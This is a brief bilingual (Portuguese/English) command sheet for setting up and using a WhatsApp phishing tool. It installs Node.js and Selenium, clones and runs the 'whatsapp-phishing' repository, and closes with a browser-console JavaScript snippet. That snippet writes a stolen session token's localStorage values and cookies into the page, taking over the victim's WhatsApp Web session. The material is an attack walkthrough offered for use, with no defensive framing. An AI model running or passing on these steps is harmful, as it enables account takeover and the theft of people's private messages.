Commands/Comandos: NPM: apt-get install npm ~~~~~~~~~~~~~~~~~~~~ NODE.JS: sudo apt-get install python g++ make checkinstall fakeroot src=$(mktemp -d) && cd $src wget -N http://nodejs.org/dist/node-latest.tar.gz tar xzvf node-latest.tar.gz && cd node-v* ./configure sudo fakeroot checkinstall -y --install=no --pkgversion $(echo $(pwd) | sed -n -re's/.+node-v(.+)$/\1/p') make -j$(($(nproc)+1)) install sudo dpkg -i node_* ~~~~~~~~~~~~~~~~~~~~ Download Selenium: wget http://selenium-release.storage.googleapis.com/2.53/selenium-server-standalone-2.53.1.jar java -jar selenium-server-standalone-2.53.1.jar ~~~~~~~~~~~~~~~~~~~~ Download WhatsApp phishing: git clone https://github.com/Mawalu/whatsapp-phishing.git cd whatsapp-phishing npm install node index.js ~~~~~~~~~~~~~~~~~~ Fork do repositório https://github.com/limontec/whatsapp-phishing ~~~~~~~~~~~~~~~~~~ Web WhatsApp browser commands (comandos no navegador) var t = CONTENT_OF_YOUR_SECRETS_FILE_COLE_A_CHAVE_AQUI function login(token) {Object.keys(token.s).forEach(function (key) {localStorage.setItem(key, token.s[key])}); token.c = token.c.split(';'); token.c.forEach(function(cookie) {document.cookie = cookie; });} login(t)